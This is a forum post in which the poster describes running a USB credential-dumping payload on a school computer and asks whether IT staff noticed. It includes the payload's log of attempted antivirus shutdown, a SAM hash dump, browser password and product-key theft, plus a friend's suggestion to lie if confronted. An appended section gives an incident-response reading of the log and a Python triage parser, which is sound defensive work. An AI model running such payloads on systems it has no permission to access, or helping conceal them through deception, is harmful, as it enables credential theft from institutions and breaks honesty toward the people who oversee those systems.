Do you think they say it...
Posted: Tue Mar 06, 2012 8:53 pm
Ok so I ran a USB pocketknife (find it on the Hak5 forums) on a school computer. After I ran it, Trend Micro OfficeScan Client popped up with a virus and I immediately unplugged my flash drive. A little while later I was looking up info about jobs in IT and someone connected to the computer via a VNC server running on it and restarted the computer. Is there any chance they saw anything, and if so, why didn't they do anything about it yet? They had like 6 hours to confront me about it. My friend said that if they ask, tell them that you were using the computer and Trend Micro popped up and then the computer restarted and you don't know why. I had my flash drive already unplugged when they connected to the computer. They have not attempted to connect back to check on me, so I think that Trend Micro told them that my computer had a virus and they fixed it and restarted it via VNC and didn't see anything obviously wrong, so they didn't do anything else.
Code:
-----------------------------------------------------------------------------------------------------------------------------
Leapos Payload [Time Started: Tue 03/06/2012 8:08:32.57]
-----------------------------------------------------------------------------------------------------------------------------
Computer Name is: ETL-07 and the Logged on User Is: removed by op
-----------------------------------------------------------------------------------------------------------------------------
+----------------------------------+
+ [System info] +
+----------------------------------+
Windows IP Configuration
Host Name . . . . . . . . . . . . : ETL-07
Primary Dns Suffix . . . . . . . : removed by op
Node Type . . . . . . . . . . . . : Hybrid
IP Routing Enabled. . . . . . . . : No
WINS Proxy Enabled. . . . . . . . : No
DNS Suffix Search List. . . . . . : removed by op
removed by op
Ethernet adapter Local Area Connection:
Connection-specific DNS Suffix . : removed by op
Description . . . . . . . . . . . : Intel(R) 82566DM-2 Gigabit Network Connection
Physical Address. . . . . . . . . : 00-21-70- removed by op
Dhcp Enabled. . . . . . . . . . . : Yes
Autoconfiguration Enabled . . . . : Yes
IP Address. . . . . . . . . . . . : removed by op
Subnet Mask . . . . . . . . . . . : 255.255.0.0
Default Gateway . . . . . . . . . : removed by op
DHCP Class ID . . . . . . . . . . : ET
DHCP Server . . . . . . . . . . . : removed by op
DNS Servers . . . . . . . . . . . : removed by op
removed by op
Primary WINS Server . . . . . . . : removed by op
Secondary WINS Server . . . . . . : removed by op
Lease Obtained. . . . . . . . . . : Tuesday, March 06, 2012 7:46:26 AM
Lease Expires . . . . . . . . . . : Wednesday, March 14, 2012 7:46:26 AM
-----------------------------------------------------------------------------------------------------------------------------
+----------------------------------+
+ [Dump SAM FGDUMP] +
+----------------------------------+
fgDump 2.1.0 - fizzgig and the mighty group at foofus.net
Written to make j0m0kun's life just a bit easier
Copyright(C) 2008 fizzgig and foofus.net
fgdump comes with ABSOLUTELY NO WARRANTY!
This is free software, and you are welcome to redistribute it
under certain conditions; see the COPYING and README files for
more information.
--- Session ID: 2012-03-06-13-08-33 ---
>> A new worker thread has been created with the ID: 00000d84 <<
Starting dump on 127.0.0.1
** Beginning local dump **
INFO: skipping cachedump on 127.0.0.1 because 127.0.0.1.cachedump exists or I was told to skip cache dumps
INFO: skipping dump of protected storage secrets on 127.0.0.1 because 127.0.0.1.lsadump exists or I was told to skip LSA dumps
Skipping impersonation (no user provided)
OS (127.0.0.1): Microsoft Windows XP Professional Service Pack 3 (Build 2600)
Trend is running on this machine, shutting it down for a bit...
ERROR OpenService: 5 - Access is denied.
ERROR OpenService: 5 - Access is denied.
Unable to stop any Trend services, see previous errors for details.
Error dumping server 127.0.0.1, see previous messages for details
Terminating thread 00000d84 (lpszServer is NULL)
-----Summary-----
Failed servers:
127.0.0.1
Successful servers:
NONE
Total failed: 1
Total successful: 0
-----Hashes-----
E:\LOGS\ETL-07\ETL-07-[20120306-080829].log
The process cannot access the file because it is being used by another process.
Could Not Find E:\LOGS\ETL-07\127.0.0.1*
-----------------------------------------------------------------------------------------------------------------------------
+----------------------------------+
+ [Dump IE PW] +
+----------------------------------+
==================================================
Entry Name : https://accounts.google.com/servicelogin
Type : AutoComplete
Stored In : Registry
User Name : removed by op
Password :
==================================================
-----------------------------------------------------------------------------------------------------------------------------
+----------------------------------+
+ [Dump Product Keys] +
+----------------------------------+
==================================================
Product Name : Microsoft Windows XP
Product ID : removed by op
Product Key : removed by op
Installation Folder : C:\WINDOWS
Service Pack : Service Pack 3
Computer Name : ETL-07
==================================================
==================================================
Product Name : Internet Explorer
Product ID : removed by op
Product Key : removed by op
Installation Folder :
Service Pack :
Computer Name : ETL-07
==================================================
==================================================
Product Name : Microsoft Office SharePoint Designer 2007
Product ID : removed by op
Product Key : removed by op
Installation Folder : C:\Program Files\Microsoft Office\Office12\
Service Pack :
Computer Name : ETL-07
==================================================
==================================================
Product Name : Microsoft Office Enterprise 2007
Product ID : removed by op
Product Key : removed by op
Installation Folder : C:\Program Files\Microsoft Office\Office12\
Service Pack :
Computer Name : ETL-07
==================================================
==================================================
Product Name : Microsoft Office Project Professional 2007
Product ID : removed by op
Product Key : removed by op
Installation Folder : C:\Program Files\Microsoft Office\Office12\
Service Pack :
Computer Name : ETL-07
==================================================
==================================================
Product Name : Microsoft Office Visio Professional 2007
Product ID : removed by op
Product Key : removed by op
Installation Folder : C:\Program Files\Microsoft Office\Office12\
Service Pack :
Computer Name : ETL-07
==================================================
-----------------------------------------------------------------------------------------------------------------------------
Leapos Payload [Time Finished: Tue 03/06/2012 8:08:34.96]
-----------------------------------------------------------------------------------------------------------------------------
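The log above is what a responder would find in E:\LOGS\<host>\ on the drive: the fgdump module tried to stop the Trend Micro services first ("Trend is running on this machine, shutting it down for a bit..."), got OpenService error 5 (ERROR_ACCESS_DENIED, i.e. the payload was not running with administrative rights), so the SAM dump failed (Total successful: 0); the IE autocomplete module recovered a username with an empty password field; the product key module read every key. Below is an added triage script that parses a log of this shape and reports which modules actually got anything. It is not part of the original post or of the Hak5 payload; the sample log is constructed to mirror the posted one (section banners, fgdump summary lines, "Key : Value" entries), and the section names, field names and the summarize() keys are this example's own choices.

```python
"""Triage a USB 'pocketknife' payload log (added example, not the payload's own code).

The sample below is constructed to match the structure of the posted log; the
hostname, user, URL, password and product keys in it are placeholders.
"""
import re
from dataclasses import dataclass, field

SAMPLE_LOG = """\
Leapos Payload [Time Started: Tue 03/06/2012 8:08:32.57]
Computer Name is: ETL-07 and the Logged on User Is: jdoe
+----------------------------------+
+ [System info] +
+----------------------------------+
Host Name . . . . . . . . . . . . : ETL-07
+----------------------------------+
+ [Dump SAM FGDUMP] +
+----------------------------------+
Trend is running on this machine, shutting it down for a bit...
ERROR OpenService: 5 - Access is denied.
Unable to stop any Trend services, see previous errors for details.
Total failed: 1
Total successful: 0
+----------------------------------+
+ [Dump IE PW] +
+----------------------------------+
Entry Name : https://accounts.google.com/servicelogin
User Name : jdoe
Password :
Entry Name : https://intranet.example/login
User Name : jdoe
Password : hunter2
+----------------------------------+
+ [Dump Product Keys] +
+----------------------------------+
Product Name : Microsoft Windows XP
Product Key : AAAAA-BBBBB-CCCCC-DDDDD-EEEEE
Product Name : Microsoft Office Enterprise 2007
Product Key : FFFFF-GGGGG-HHHHH-IIIII-JJJJJ
Leapos Payload [Time Finished: Tue 03/06/2012 8:08:34.96]
"""

SECTION_RE = re.compile(r"^\+ \[(?P<name>[^\]]+)\] \+$")
HEADER_RE = re.compile(r"^Computer Name is: (?P<host>\S+) and the Logged on User Is: (?P<user>.*)$")
KV_RE = re.compile(r"^(?P<key>[A-Za-z ]+?)\s*:\s?(?P<val>.*)$")  # "Key : Value" lines


@dataclass
class Triage:
    host: str = ""
    user: str = ""
    av_tamper_attempted: bool = False   # payload tried to stop the AV services
    av_tamper_blocked: bool = False     # ... and was refused (access denied)
    sam_dump_succeeded: bool = False    # fgdump reported at least one successful server
    ie_entries: list = field(default_factory=list)    # dicts: url, user, has_password
    product_keys: list = field(default_factory=list)  # products whose key was read


def split_sections(text):
    """Group log lines under the '+ [Name] +' banner that precedes them."""
    sections, current = {"_preamble": []}, "_preamble"
    for raw in text.splitlines():
        line = raw.strip()
        m = SECTION_RE.match(line)
        if m:
            current = m.group("name")
            sections.setdefault(current, [])
            continue
        if not line or line.startswith(("+--", "---", "===")):
            continue  # banner borders and separators carry no data
        sections[current].append(line)
    return sections


def records(lines, start_key):
    """Turn 'Key : Value' lines into dicts, opening a new dict at each start_key."""
    out, cur = [], None
    for line in lines:
        m = KV_RE.match(line)
        if not m:
            continue
        key, val = m.group("key").strip(), m.group("val").strip()
        if key == start_key:
            cur = {}
            out.append(cur)
        if cur is not None:
            cur[key] = val
    return out


def triage(text):
    t = Triage()
    sections = split_sections(text)
    for line in sections["_preamble"]:
        m = HEADER_RE.match(line)
        if m:
            t.host, t.user = m.group("host"), m.group("user").strip()
    sam = sections.get("Dump SAM FGDUMP", [])
    t.av_tamper_attempted = any("shutting it down" in l for l in sam)
    t.av_tamper_blocked = any("Access is denied" in l or "Unable to stop" in l for l in sam)
    for line in sam:
        m = KV_RE.match(line)
        if m and m.group("key").strip() == "Total successful":
            t.sam_dump_succeeded = int(m.group("val")) > 0
    for r in records(sections.get("Dump IE PW", []), "Entry Name"):
        t.ie_entries.append({"url": r.get("Entry Name", ""), "user": r.get("User Name", ""),
                             "has_password": bool(r.get("Password", ""))})
    for r in records(sections.get("Dump Product Keys", []), "Product Name"):
        if r.get("Product Key"):
            t.product_keys.append(r["Product Name"])
    return t


def summarize(t):
    """Flatten a Triage into the handful of facts an IR ticket needs."""
    return {
        "host": t.host,
        "user": t.user,
        "hashes_taken": t.sam_dump_succeeded,
        "av_tampering": "blocked" if t.av_tamper_blocked
                        else ("succeeded" if t.av_tamper_attempted else "none"),
        "ie_passwords_taken": sum(1 for e in t.ie_entries if e["has_password"]),
        "ie_usernames_taken": sum(1 for e in t.ie_entries if e["user"]),
        "product_keys_taken": len(t.product_keys),
    }


if __name__ == "__main__":
    for k, v in summarize(triage(SAMPLE_LOG)).items():
        print(f"{k}: {v}")
```

Run against the constructed sample this reports hashes_taken False and av_tampering "blocked", matching what the posted log shows; the same parser flags a log where fgdump printed "Total successful: 1", which is the case that should escalate the ticket to a domain-wide password reset rather than a reimage of one lab machine.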